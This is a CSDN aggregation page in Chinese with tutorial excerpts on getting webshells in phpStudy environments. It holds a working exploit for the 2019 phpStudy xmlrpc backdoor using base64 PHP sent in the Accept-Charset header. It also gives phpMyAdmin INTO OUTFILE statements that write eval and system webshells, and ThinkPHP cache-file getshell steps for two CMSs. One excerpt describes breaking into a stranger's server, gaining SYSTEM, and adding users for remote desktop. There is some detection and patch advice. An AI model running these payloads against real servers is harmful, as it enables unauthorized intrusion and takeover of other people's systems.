phpstudy shell写入_phpstudy 写入的中文是乱码的怎么办 - CSDN
精华内容
参与话题
  • Phpstudy隐藏后门

    万次阅读 热门讨论 2019-09-25 14:39:30
    Phpstudy隐藏后门 1.事件背景 Phpstudy软件是国内的一款免费的PHP调试环境的程序集成包,通过集成Apache、PHP、MySQL、phpMyAdmin、ZendOptimizer多款软件一次性安装,无需配置即可直接安装使用,具有PHP环境...

    Phpstudy隐藏后门

     

    1.事件背景

    Phpstudy软件是国内的一款免费的PHP调试环境的程序集成包,通过集成ApachePHPMySQLphpMyAdminZendOptimizer多款软件一次性安装,无需配置即可直接安装使用,具有PHP环境调试和PHP开发功能,在国内有着近百万PHP语言学习者、开发者用户

    920日杭州公安微信公众账号发布了杭州警方通报打击涉网违法犯罪暨净网2019”专项行动战果的文章,文章里说明phpstudy存在后门

    2.影响版本

    软件作者声明phpstudy 2016PHP5.4存在后门。

    实际测试官网下载phpstudy2018php-5.2.17php-5.4.45也同样存在后门

    3.后门检测方法

    通过分析,后门代码存在于\ext\php_xmlrpc.dll模块中
    phpStudy2016phpStudy2018自带的php-5.2.17php-5.4.45
    phpStudy2016
    路径
    php\php-5.2.17\ext\php_xmlrpc.dll
    php\php-5.4.45\ext\php_xmlrpc.dll
    phpStudy2018
    路径
    PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll
    PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dl

    用记事本打开此文件查找@eval,文件存在@eval(%s(‘%s’))证明漏洞存在

     

    附后门文件MD5值:

    MD5: 0F7AD38E7A9857523DFBCE4BCE43A9E9
    MD5: C339482FD2B233FB0A555B629C0EA5D5

     

    4. 后门利用手法

     将含有后门的phpstudy 运行起来 然后访问网站

     

     

    访问目标站点

     

    抓取访问包 修改请求包内容 直接触发远程命令执行

     

    Accept-charset: ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7

    Accept-Encoding: gzip,deflate

     

    ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7 base64加密的 解密后  echo system("net user");

     

    添加 远程命令 触发后门

    5 得到路径  并写入shell文件 

     

    Ps !! 在这里要首先了解下 web写入后门木马的误区

             用^转移 >< 不然<>会自动转换为别的格式

    连接 webshell

    6 修复方案

    1、可以从PHP官网下载原始php-5.4.45版本或php-5.2.17版本,替换其中的php_xmlrpc.dll

    https://windows.php.net/downloads/releases/archives/php-5.2.17-Win32-VC6-x86.zip
    https://windows.php.net/downloads/releases/archives/php-5.4.45-Win32-VC9-x86.zip

    2、目前phpstudy官网上的版本不存在后门,可在phpsudy官网下载安装包进行更新

     

    展开全文
  • 学习mysql数据库漏洞整理过程中,想复现phpmyadmin写入一句话后门getshell的过程遇到很多问题。phpmyadmin是很多网站用来管理数据库的一个系统,尤其是mysql数据库管理的较多。phpmyadmin实现mysql数据库的管理,...

    学习mysql数据库漏洞整理过程中,想复现phpmyadmin写入一句话后门getshell的过程遇到很多问题。phpmyadmin是很多网站用来管理数据库的一个系统,尤其是mysql数据库管理的较多。phpmyadmin实现mysql数据库的管理,采用phpstudy实现较为方便。过程出现较多障碍,一步步走向成功,记录。

    1 启动phpstudy,出现mysql无法启动的问题

    因为之前已经装过Mysql,并使用过。因此要关闭mysql数据库,并且要把系统服务里面的MySQL删除,留下MySQLa服务。

    以管理员运行cmd,在cmd命令行下输入:

    sc delete mysql    

    2 在通过报错等方式获取phpmyadmin绝对路径后,出现#1290 - The MySQL server is running with the --secure-file-priv option so it cannot execute this statement。

    原因是没有开通导入此路径的权限。通过SHOW VARIABLES LIKE "secure_file_priv";查询

    因此,我们需要开通此权限在,打开磁盘下PhpStudy\PHPTutorial\MySQL\my.ini文件,修改Secure File Priv。

    可以参考一下:

    (1)不允许MySQL进行导入导出

    # Secure File Priv.
    secure-file-priv = null

    (2)只允许MySQL在指定的目录下进行导入导出操作

    # Secure File Priv.
    secure-file-priv = /目录/

    (3)不对MySQL的导入导出进行限制(注释或删除secure-file-priv配置)

    # Secure File Priv.
    #secure-file-priv = "C:/ProgramData/MySQL/MySQL Server 5.7/Uploads"

    这里我采用第二种方法,修改指定目录

    然后重启phpstudy,重新登录phpmyadmin,然后执行:

    select '<?php eval($_POST[cmd]); ?>' into outfile 'E:/PhpStudy/PHPTutorial/WWW/phpMyAdmin/cmd.php';

    成功。

    访问phpmyadmin下次文件。

    然后采用菜刀连接,getshell:

    也可以通过创建命令形势的shell实现。

    select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/PhpStudy/PHPTutorial/WWW/phpMyAdmin/cmd.php'

    然后访问:http://localhost/phpMyAdmin/cmd.php?cmd=ipconfig,可进行命令执行。

    展开全文
  • phpstudy后门getshell

    千次阅读 2019-10-14 22:47:52
    昨天在测试时候监听着我自己服务器的80端口,突然有个请求过来了。。...看到phpstudy,忽然想起前些天的phpstudy后门。在网上查了一下, 我看的是这篇文章: https://www.cnblogs.com/-qing-/...

    昨天在测试时候监听着我自己服务器的80端口,突然有个请求过来了。。一看ip,和我在同一个公网网段。可能是有人在扫我吧。

    在浏览器里直接访问他的ip,发现80端口上搭了一个php服务。直接访问是一个phpstudy的探针。

     

    看到phpstudy,忽然想起前些天的phpstudy后门。在网上查了一下,

    我看的是这篇文章:

    https://www.cnblogs.com/-qing-/p/11575622.html

    看了一下,这个服务器支持 xmlrpc 模块,

    在这个探针中可以看到当前路径和www的路径是 c:\phpstudy\www\

    看了一下文章,基本就是这么回事:如果你的phpstudy有后门,可以在该环境中执行任意php代码。代码的位置在,发往这个服务器的任何http请求头中,增加一个字段,accept-charset,这个字段的值,就是将代码base64编码以后的结果。

     

    将一段php写文件的代码编码一下:

    $myfile=fopen("c:\phpstudy\www\p.php","w");$t="<?php @eval($_POST['666999ttt']) ?>";fwrite($myfile,$t);fclose($myfile);

    然后请求一下根目录,抓包,并在请求头重添加 accept-charset 字段,这个字段的值是上面base64编码的结果,

     

    注意发请求时候有个坑,在上面的Accept-Encoding字段里,“deflate”前面默认是有一个空格的,带着这个空格发请求的话代码会执行失败,把这个空格删去就好了。

    菜刀连接http://xx.xx.xx.xx/p.php,使用的参数是666999ttt,然后就getshell了,

    打开菜刀里的命令终端,执行一下whoami,看一下权限,是system,看起来权限还很大…只能说phpstudy牛皮!

    接下来就是增加用户、添加权限等操作了。下面是添加好用户远程桌面连接的截图。

    发现php里面getshell的骚思路还是很多的,打算接下来练练手。

    展开全文
  • 0×00 前言 ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的,由于其简单易用,很多cms都基于该框架改写。... 0×01 环境搭建 ...phpstudy http://www.phpstudy.net/phpstudy/phpStud...

    0×00 前言

    ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的,由于其简单易用,很多cms都基于该框架改写。然而 Thinkphp在缓存使用却存在缺陷,生成缓存时,Thinkphp会将数据序列化存进一个php文件,这就产生了很大的安全问题。

    0×01 环境搭建

    工具

    phpstudy

    http://www.phpstudy.net/phpstudy/phpStudy20161103.zip

    Jymusic cms

    http://www.jyuu.cn/topic/t/41

    xyhcms

    https://pan.baidu.com/s/1qYhTKc8

    搭建

    安装好phpstudy,把jymusic目录下的所有文件及文件夹拷贝到phpstudy的www目录下,浏览器访问http://localhost/install.php,然后配置一下数据库信息即可。

    另外xyhcms安装类似,这里不赘述。

    0×02本地后台getshell

    Jymusic cms

    先看一下管理员登录页面的源代码,看到核心入口为ThinkPHP.php,找到并打开查看

    发现应用缓存目录为Temp文件夹

    打开Temp文件夹会发现有很多缓存文件,我们随便打开即可看看,可以发现里面的内容有点像网站配置信息,只不过是序列化后的结果

    所以我们在后台的网站设置处插入一句话,就会被ThinkPHP写入缓存文件。而且这个缓存文件的文件名都是固定不变的,这也是导致getshell的原因。

    成功插入后,我们来执行一下phpinfo()函数看看,菜刀也能成功连接

     

    xyhcms

    xyhcms和Jymusic cms一样使用了ThinkPHP框架,这里不赘述,直接给出缓存文件的位置

    xyhcms其实还有一个漏洞,在模板管理处可以添加一个php后缀的模板,文件内容也未做任何检测过滤。下面是成功getshell过程

     

    0×03总结

    其实现在很多小型网站都是基于ThinkPHP框架开发的,很多都存在这种问题。当你找不到上传点的时候,可以试试这种方法。当然,肯定有人会说,这个要后台登录才能利用,你只是在本地复现,都没实战过,说个锤子。其实,我还真的实战过,只是不方便贴图,使用弱口令做密码还是挺多的,所以锤子未必不可用。还有,有的网站,虽然说你用很简单的方法getshell,但是其实可以研究的东西还有很多,比如你getshell之后发现权限不够,那就可以试试提权,例如用udf提权、使用mysql远程连接结合sqlmap提权等等,虽然有些方法很早就有了,但是并不是每个人都会,而且一些老的思路还有可能启发你新的思考,继续加油吧!

    转自:https://www.freebuf.com/articles/web/148629.html

    展开全文
  • 利用phpStudy 探针 提权网站服务器

    万次阅读 2016-03-04 15:32:02
    今天看到论坛有人发布了一个通过这phpStudy 探针 关键字搜索检索提权网址服务器,这个挺简单的.记录一下吧。 搜索引擎KeyWord: phpStudy 探针 2014 多往后翻翻。翻个几十页最好。 点开搜索到的内容。 1. 点开搜索到...
  • 总结下写phpmyadmin写shell的方法

    千次阅读 2019-09-10 10:47:05
    2.网站绝对路径(确定有写入权限) 3.magic_quotes_gpc:Off(关闭) 导出WebShell其它条件: 1.magic_quotes_gpc:开启时,会对’单引号进行转义,使其变成“\”反斜杠。 2.secure_file_priv:此配置项用来完成...
  • 一、union select 后写入 最常见的写入方式,union select 后跟 into outfile 语句 1' union select 1,2,'<?php @eval($_POST[cmd]);?>' into outfile "C:\\phpStudy\\PHPTutorial\\WWW\\shell.php" --+ 1' ...
  • 漏洞概况 ThinkPHP是一款国内流行的开源PHP框架,近日被爆出存在可能的远程代码...由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞。 漏洞危害 攻击者可通过该漏洞获取...
  • 基于ThinkPHP的2个CMS后台GetShell利用

    千次阅读 2017-09-26 15:14:53
    * 本文作者:Mochazz,本文属FreeBuf原创奖励计划,未经许可禁止转载 文章作者:Mochazz 思路作者:szrzvdny 0×00 前言 ...ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的,由于其简单易用,很多cms...
  • PhpStudy BackDoor 2019漏洞

    千次阅读 2020-05-05 18:45:02
    北京时间9月20日,杭州公安发布《杭州警方通报打击涉网违法犯罪暨‘净网2019’专项行动战果》一文,文章曝光了国内知名PHP调试环境程序集成包“PhpStudy软件”遭到黑客篡改并植入“后门”。截至案发,近百万PHP用户...
  • php.ini生产环境禁用函数设置

    千次阅读 2018-04-13 17:59:23
    在php.ini文件里面找到一个配置项叫disable_functions,,写...phpinfo, set_time_limit,system,exec,shell_exec,passthru,proc_open,proc_close,proc_get_status,checkdnsrr,getmxrr,getservbyname,getservbyport,...
  • 网站后台getshell的方法总结

    千次阅读 2019-07-12 20:13:27
    方法一:直接上传getshell 以dedecms为例,后台可以直接上传脚本文件,从而getshell,具体方法如下: 即可成功上传大马,并成功执行,从而拿下webshell。 坑:通常由于权限限制,导致只有该目录权限,无法进入其他...
  • 渗透测试-PhpMyAdmin后台getshell

    千次阅读 2019-08-10 22:28:30
    在通过对目标进行信息收集探测后,当发现存有phpmyadmin目录时,进而通过弱口令或者暴力破解进入数据库之后,有多种方法进行getshell。 MySQL导出木马 最常用的是通过into outfile直接写入一句话木马: select '&...
  • 一、union select 后写入 最常见的写入方式,union select 后跟 into outfile 语句 1’ union select 1,2,’<?php @eval($_POST[cmd]);?>’ into outfile “C:\phpStudy\PHPTutorial\WWW\shell.php” --+ 1’ ...
  • 该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.0和5.1版本,推荐尽快更新到最新版本。 二、修复方案 Thinkphp v5.0.x...
  • PhpMyAdmin 网站路径信息获取

    万次阅读 2017-03-13 14:09:01
    1.环境说明 本篇学习总结,主要以apache中间件为主要环境进行研究学习,其他中间件情况思路基本类似,这里不做具体展开说明。 2. 基本思路 2.1.思路说明 找网站的安装路径,其实就是通过“配置页面”或者...
  • 首先下载去官网下载phpstudy 可以访问phpstudy官网下载,我这边下载的是64位的。 下载完成之后安装+启动 打开浏览器访问http://127.0.0.1说明web环境搭建成功。 打开文件位置 进入www目录下 我们可以在这个目录...
  • 批量getshell教程+工具

    2020-07-24 23:33:56
    批量getshell教程+工具
  • 目标ip:192.168.52.143 ...二、登录数据口后台,写入一句话木马 select ‘<?php eval($_POST[x]);?>’ into outfile ‘c:/phpstudy/www/xx.php’ 执行的时候报错 解决方法: 1、设置slow_...
1 2 3 4 5 ... 20
收藏数 528
精华内容 211
关键字:

phpstudy shell写入